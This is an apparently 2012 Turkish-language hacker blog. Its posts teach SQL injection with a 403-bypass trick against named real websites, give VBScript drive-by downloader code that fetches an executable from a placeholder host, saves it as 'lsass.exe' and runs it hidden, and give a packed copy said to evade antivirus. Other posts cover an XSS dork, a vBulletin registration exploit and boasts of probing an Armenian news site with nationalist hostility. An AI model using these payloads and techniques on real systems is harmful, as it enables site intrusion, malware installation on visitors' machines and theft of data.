28 Haziran 2012 Perşembe

Joomla Brute Force (MKT-Norton)

Video : http://www.youtube.com/watch?v=H4wSTlsSBvo

Re(Reply) : Selamun ALeykum Ben Semir (MKT) [SQL Injection bypass 403 error]

Ve Aleykum Salam. Hos Geldin.. Iyi Forumlar Dilerim. Gelelim Nasil Baslaya bilirsin bu Web Hack olayina. Tam iyi 1 Hacker olmak icin 3 farkli dili bilmen gerekir. Aslinda Simdiki devr-de 1 Site Hacklarsan kendi kendine Hacker diyorsundur. Gelelim kicik aciklara. Mesala anket acigi onlar cok yeni baslayanlar icin. Sen ise Yeni Basladin ve soyledigin gibi PHP / HTML / ASP -ni 1-1inden ayird ede biliyorsun. En iyi yontemler Persistent / Dom XSS aciklari. Cookie calma en iyi yontemlerden 1-idir. Joomla Brute Wordpress Brute gibi yollarda olur. Ve Modern Web hack Yolu "SQL" Yani "Structured Query Language" Turkce Yapilandirilmis Sorgu dili. Ve Havij adli 1 program var onunla bu SQL aciklardan kullanarak yararlana bilirsin. Yadaki en guvenli safe yol ise Manual Gitmekdir. Iste arada 1 Problemler cikar orasi sorun deyil. Mesela Sana 1 trick oyrediyim. Belkide biliyorsundur.Sitede SQL -de order by cekdikde 403 Forbidden hatasi cikiyor. Bazi sitelerde oyle. Bazilarinda 406 not Acceptable cikiyo onu WAF ile kecersin amma zorlusu 403-dur ve Bypass edilmesi pek o kadarda zor deyildir. Mesala Sitemiz :

Kod:
http://construction.am/article.php?id=210
Errorumuzu Aldik kolumn sayimizi bulduk 12
Kod:
http://construction.am/article.php?id=-210+union+select+1,2,3,4,5,6,7,8,9,10,11,1
Ve bu zamanda bize 1 403 forbidden verir. Biz bunu nasil atlarik ve bypass ederik? Anlatigim :
Kod:
union+select+1,2,3,4,5,6,7,8,9,10,11,12
Yerine Boyle yazarsan :
Kod:
union+(select+1,2,3,4,5,6,7,8,9,10,11,12)--
Ve ya
Kod:
uNioN+(sElEcT+1,2,3,4,5,6,7,8,9,10,11,12)--
Gibi yapa biliriz Altdada site uzerinde :
Kod:
http://construction.am/article.php?id=-210+uNioN+(sElEcT+1,2,3,4,5,6,7,8,9,10,11,12)--
Ve gordukki 403 Forbidden gitti 8 coulumn sayimizi aldik.
Kod:
http://construction.am/article.php?id=-210+uNioN+(sElEcT+1,2,3,4,5,6,7,version(),9,10,11,12)--
Version : 5.5.19-55
Simdi table ve column adlarini cekelim :
Kod:
http://construction.am/article.php?id=-210+uNioN+(sElEcT+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12+from+information_schema.tables)--
Ve 403 forbidden verdi. Bunun anlami kodumuzda filtre var.
Kod:
http://construction.am/article.php?id=-210+uNioN+(sElEcT+1,2,3,4,5,6,7,table_name,9,10,11,12+from+information_schema.tables)--
Yine 403 Forbidden. Bunun anlami "tables" sozumuzde filtre var bunun yerine biz "table_constraints" yaza biliriz aynen "order+by" / "group+by" gibi.Ve group_concat calismadigi icin bizde limitle cekicez.
Kod:
http://construction.am/article.php?id=-210+uNioN+(sElEcT+1,2,3,4,5,6,7,table_name,9,10,11,12+from+information_schema.table_constraints+limit+0,1)--
Burda 0,1-de 0-i artiricaz taki aradigimiz tableleri buluncaya kadar. Ve Simdide column-larda boyle olucak :
Kod:
http://construction.am/article.php?id=-210+uNioN+(sElEcT+1,2,3,4,5,6,7,column_name,9,10,11,12+from+information_schema.columns+where+table_name=0xTableHexlenmiwFormada+limit+0,1)--
Data cekerken ise :
Kod:
http://construction.am/article.php?id=-210+uNioN+(sElEcT+1,2,3,4,5,6,7,columnadı,9,10,11,12+from+tableadı+limit+0,1)--
Ve bu kadar. Simdide gelelim 1 seye ilk kez denediyinizde order+by cekdiyinizde 403 forbidden verirse o zaman siz gorup+by deneyin
Kod:
http://www.veikot.lv/index.php?id=10+order+by+1 - 403 ERROR
Kod:
http://www.veikot.lv/index.php?id=10+group+by+1 - Dogru Sayfa
Ve boyleliklede Bypass etmis oluruz. Ve Soyledigim gibi en iyisi HTML / PHP / MySQL oyren PHP-de cok kolay $deyer filan onlari oyrenirsen cok iyi olur cok sey bilirsin Neyin nasil ve narda olacagini. Acik nerde? Neden acaba? Yeni Vuln-lar bulub Fix-leye bilirsin. Basarilar.
Greet'Z To : BOT_25
&& Respect! :D Avatar Fearless! ^_^

Auto Downloader (HTML Keylogger)


Selamlar. Bu GUnki Dokumanimda hem HTML Keylogger (Auto Downloader) hemde onlardan korunmak icin 1 kac teknik paylasicam. Korunmadan Baslayarak ortaya dogru gidelim. Ilk once her zaman oldugu gibi Anti-virusunu Acik tut. Ve Ne download edersen et Oracle VM yani VirtualBox-da acki zarari olmasin bilgisayarina.Burda Sitelerde Registrasiya yerini gorunce anlarsiniz. zaten. Bunu soyleye bilirmki eger 1 sitede "Anti-Virus Sok! Bedava ESET indi ve Calistir!" gibi yazilimlar varsa ve Hemen uzerine basarken download gibi 1 sey gelirse sakin onu indirme ve hemen linki Blackliste at Engelle Host-undan(PC-den). Bazen oluyo oyle HTML yazilimlari. Mesela Auto Downloader-ler.1 nevi HTML Keyloggerler. Bunlarin CRYPT olunmus halleride olur. Yani ilk once 1 misal vereyim :
Kod:
<script language="VBScript">
on error resume next
Set obj1 = document.createElement("object")
obj1.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
est1="Microsoft."&"_xmlHTTP"
Set obj2 = obj1.CreateObject(est1,"")

est="Ado"&"db."&"Str"&"eam"
set obj3 = obj1.createobject(est,"")
obj3.type = 1
est2="GET"
obj2.Open est2, "http://www.siteniz.com/keyloggeradresiniz.exe", False
obj2.Send

set F = obj1.createobject("Scripting.FileSystemObject","")
set pasta = F.GetSpecialFolder(2)
fi="lsass.exe"
fi= F.BuildPath(pasta,fi)

obj3.open
obj3.write obj2.responseBody   
obj3.savetofile fi,2
obj3.close

set obj5 = obj1.createobject("Shell.Application","")

obj5.ShellExecute fi,"","","open",0
</script>
Burda keyloggeradi.exe yerine keyloger-in adi yazilir. Ve auto download olunur bilgisayariniza amma calistirilmaz. Bunu siz bilmedende calistira bilirsiniz. Amma AV(Anti-Virus) bu tiplisiteleri engelliyor. 1 seyde var. Bu 1 JavaScript-ir. Ve Bu DeCrypt-lenmis hali. yani bunu biz crypt-lersek AV-ler tutmaz. Bu zaman kolaylikla Indirile bilir. Simdi gelelim Crypt-lenmis haline :
Kod:
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('<10 33="32">31 29 30 34 11 3=35.40("39")3.28"36","37:41-26-22-21-20"18="27."&"25"11 7=3.24(18,"")17="23"&"19."&"38"&"53"6 4=3.8(17,"")4.58=1 15="57"7.56 15,"42://60.59.62/64.13",63 7.61 6 9=3.8("55.54","")6 12=9.46(2)5="45.13"5=9.44(12,5)4.14 4.43 7.47 4.48 5,2 4.52 6 16=3.8("51.50","")16.49 5,"","","14",0</10>',10,65,'|||obj1|obj3|fi|set|obj2|createobject|F|script|Set|pasta|exe|open|est2|obj5|est|est1|db|00C04FC29E36|983A|11D0|Ado|CreateObject|_0|65A3|Microsoft|setAttribute|error|resume|on|VBScript|language|next|document|classid|clsid|Str|object|createElement|BD96C556|http|write|BuildPath|lsass|GetSpecialFolder|responseBody|savetofile|ShellExecute|Application|Shell|close|eam|FileSystemObject|Scripting|Open|GET|type|siteniz|www|Send|com|False|keyloggeradresiniz'.split('|'),0,{}))
Buda crypt-lenmis Hali. Bunu "StealtH" gardasim test etdi Kaspersky bunu gormuyor auto download olunuyor. Ve bu Crypt-leri sakin ama sakin VirusTotal-da calistirmayin! Cunki Blackliste dusuyor ve ise yaramaz hala geliyor. Simdi aklinizda 1 soru tmm bu keyloggerimiz download oldu peki acmazsa aktiv olmaz axi?! Bu size kalmis adini cok guzel 1 sey koyun her kes acsin Ve soylediyim gibi bu tur programlari Virtual-da acin tanimadiginiz 1 program olursa hemen virtualda. Ve hala bazi DDoS programlarinin Backdoor-lari olur onun icin Kendi bilgisayarinizda Script-lerden Virtual-da ise DDoS Programlarindan istifade edin. Bu Secure-dir. Kolay gele (:
Greet'Z To : M4NY3T!K & StealtH & FleXDoWN(Sh00CK!nG)

XSS Nedir? Nasil yaranir? Kapatilir? Nasil Bulunur?

Salamun Aleykum Gardaslar. Simdiki dokumanda sizlere 1az XSS acigi hakkinda bilgi vericem.
[1.]XSS nedir?
XSS "Cross Site Scripting" adlanan 1 Web Acigidir. Bu Yontem SQL gibi servere degil kullaniciya yonelmis attack-dir.
[2.]XSS Nasil Yaranir?
XSS bazi degisken-lerin adinin cekildiyi amma gercekde var olmadigi yerlerde yaranir. Nasil yani? Soyle :

Kod:
<?php
$var2 = $_GET[’var1];
echo $var2
?>
BUrda echo ile $var2 degiskenini cagiriyoruz, Ve $var2 degiskenide $_GET ile `var1-i kontrol ediyor. Amma var1-in ne oldugu burda yazilmamis. Ve Buda XSS yaranma nedenlerinden 1-i. Yazilipda Gercekte aciklanmamasi gibi.(NOT:Turkcem 1 az kotudur ).Diyer 1 yol-da Thema-dan kaynaklanir. Orda ya Themanin dogru kurulmamasi sirasinda hem parse olunur hemde inject yada Thema-ni degiserken hem CSS-den hemde index.php-den 1 kac kodun eskilmesi neticesinde.
[3.] XSS Nasil Kapatilir?
2-ci bolumde gosterdiyim gibi. Var olub olmadigina bakariz. Mesela :
Kod:
<?php
if(isset($_GET[’var1’])) // Kontrol if $_GET[’var1’] varmi?
{
echo htmlentities($_GET[’var1’] ENT_QUOTES); // Yansit ve encode kodlarla devam et
}
?>
Boz burda encode kodlarla devam etdiyimiz icin ve isset-den kullandigimiz icin 1 nevin parse oluyor. Ve boylelikle filtre keciyor.
[4.0] XSS Nasil bulunur?
En cok Arama motorlarinda bulunur. Ve ya Ziyaretci defterlerinde. Ve ya kicik 1 dork-da vardir :
Kod:
inurl:"search.php?q="
Boylece Bununla arama motorlarinda XSS olan siteler gelir. Ben Shahsen XSS-i [x-x Cross Site Scripting] diye cagiririm. Oyle daha havali oluyo basarilar.
&& Respect! ^_^ Avatar Fearless!

PanArmenian.Net x-x Cross Site Scripting Vuln Detected!(KAPAK!)

Selamun Aleykum Arkadaslar. Ben az once ermeni hacker-ler varmi yokmu deye google-de arastirma yaptim. Ve panarmenian.net sitesini buldum orda gua ermeni hackerler Azeri sitelerinin 20-den cok sitesini hacklaiklari hucum etdikleri soyleniyordu. Burdan anladimki Artistlik yapiyorlar. Site yok mirror yok. Ne (afedersiniz) b*k varki? Onun icin sitede kicik 1 pentest XSS yaptim. Ilk bakisda cikdi. Proof cekdimki sonrada biz soylerken inansinlar diye. ve amatorluk yapib konu-lari editlemekdense 1-i tam index-i yapistirsa iyi olur ))). Video onlar hakkinda yazdiklari ve diger malumatlar video-da var :
http://www.youtube.com/watch?v=ngsk5hOAFEs
Sitenin ermeniler hakkinda paylasdigi bolum :
http://www.panarmenian.net/eng/news/94627/

Buda bunlara KAPAK OLSUN!!!

RFU.Com.Tr.Mk.Gd Garip Acik

Selam Ustadlarim. Nasilsiniz? Umarim iyisinizdir. Iste oylesine geziyordum. Acik konusursak oylesine degil. Bu ermenistan SQL Acigi adli bolmeni okuyordum. Ordaki comment-ler cok guzeldi. Konu : http://www.millikuvvetler.net/showthread.php?t=8131
Ve Elcibay-in bu yazdigi Comemnt benim ilgimi cekdi: http://www.millikuvvetler.net/showpo...1&postcount=10 BoF / Buffer OverFlow / Overflow / XSS / CSRF onlari biliyordum. yani yazidigini anladim . Amma bu RFU ne tam anlamadim bende onun icin google-de kicik bir arastirma yaptim bu RFU hakkinda. Ve karsima baslikda (http://www.rfu.com.tr.mk.gd/) yazilan site cikdi. Ve bende XSS acigi varmi diye 1 test yaptim ve cok garip 1 Acik-la karsilastim. Aslinda site 1 nevin cokmus. Yani DDoS(Distrubited Denial of Service)-da ola bilir amma bu Search plugini calismiyor sayfalar silinmis. Hatta 1 turk sitesi ++ Sitenin domaininde cay icib omur surulucek kadar uzanti var (anlami iyi 1 site ). Utanmasa SQL / XSS / RFI / LFI hatta ISS bile yapar bu. Site-de SelfDDoS ola bilir. Index.php-de. Arama Motorlarina 2 yazdim Runtime error cikti. 1 Nevin site tarihe gomuldu amma garip olan suki Bu runtime error-lari neden fixlememisler? Her kimse bunu yapan demekki Rugby sevmez. Bundan ilave site ASP/ASPX ile kurulmus. Asp admin acigi ola bilir. Amma oda silinmis zaten. Yani bizim yalniz ve yalniz Red Hat'Z olmamiz gerekirki turkiyede ve Azerbeycanda iyi siteler kurulsun. EH[Ethichal Hacker'Z]. Respect!! ^_^

VBulletin 3.8.4 & 3.8.5 Admin & XSS [x-x Cross Site Scripting] & DataBase Vulnerable!

Selamun Aleykum Arkadaslar. Oylesine geziyordum birden Sitedeki bu yazilari gordum :

Kod:
Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.
Millikuvvetler.Net, Hack, Forum Hack, Msn Hack, Keylogger, Trojan, Anti Pkk, Anti Lamer
ASlinda pekde onem vermemisdim. Amma En cok onemlisi bu Version 3.8.4 oldu. Simdi ben bu acigi burda public etmek istemezdim. Amma simdi ben Priv8 bolumune giremiyorum. + ordada share yapsam o zaman onemli degil oraya yetkili kisiler gelir. Lamer-ler degil. Neyse. Simdi gelelim Vuln-umuza. Bu Vuln VBulletin-in 3.8.4 ve 3.8.5 version-larinda gorulmusdur. Onun icin Kapatilmasi Gereklidir. Baslayalim :
Kod:
 
# Vuln Name : vBulletin 3.8.4 & 3.8.5 Around Registration Vulnerability
# Data : 29/08/2010
# Author : Immortal Boy
# Version : 3.8.4 & 3.8.5
# Dork to Search 1 :powered by vBulletin 3.8.4
# Dork to Search 1 :powered by vBulletin 3.8.5

[+] About :
Immortal Boy Found This Vulnerable.
[-] Exploit : 
Priv8!(verilmiyor)
[?] How to Use :
You Will Register With admin's Username in target site & add the exploit to After admin's username
Aciklayayim. Orda [-] Exploit : yazdigim yerde priv8 yazili duruyo. Bunu kendim oyle yaptimki belkide burda Hala acik active halda ola bilir. Onun icin. Gelelim Nasil yapiliyor. Forumda adminin username-sin nikini goturuyon 1 txt-ye atiyoruz. Sonra sitede reg oluyoruz o zaman adminin nickini yazib sonuna exploit-imizi yaziyoruz ve ADminin nickiyle reg oluyoruz. Bu zaman exploit-imiz gorunmuyor. Kapatilma yontemide var. Simdi Kapatilmasi icin :
Kod:
Admin Panel > Vbulletin Optionlarin > Kelime Yasaklama
Yerinde bunlari yasakliyoruz "&#" ve tamamdir.
NOT : simdi bazi lamer-ler denemeye kalkar. Amma soyleyeyim. Sadece bunlarla bitmiyor Exploit-imiz biraz uzun Onun icin denemeye bile kalkmayin . Simdi tarihe bakilirsa eski 1 aciga benziyor bence burda kapatilmistir. Birde Moderator CP-de XSS acigi bulunmaktadir. Onuda Anlatiyim :
Kod:
1 Sitede Admine +SM giderek moderator oluyoruz. Ve Bu zaman sitede MOD panelinde Duyuru ekle yerinde XSS acigi bulunuyor:
[!]Test :
http://siteadi.com/forum/modcp/announcement.php?do=add
[+] Exploit :
Istediginiz JS yedire bilirsiniz mesela : <script>alert(1);</script>
gibi. Bununda kapatilma yolu sadece guvendiginiz kisileri Mod yapin :D
1-de Database acigi var. Onuda anlatiyim. Simdi bazi vbulletin sitelerinde yardim bolumu var. Ordada faq.php oluyo cok zaman. Ordan biz Database malumatlarini ceke biliyoruz. Arama yerine Database yazin ve gelicek. Amma bu acik burda kapatilmis Ve Hepinize ve Rainman / BarlasTurk site adminlerine Basarilar! )) && Respect!! ^_^
Avatar Fearless :))))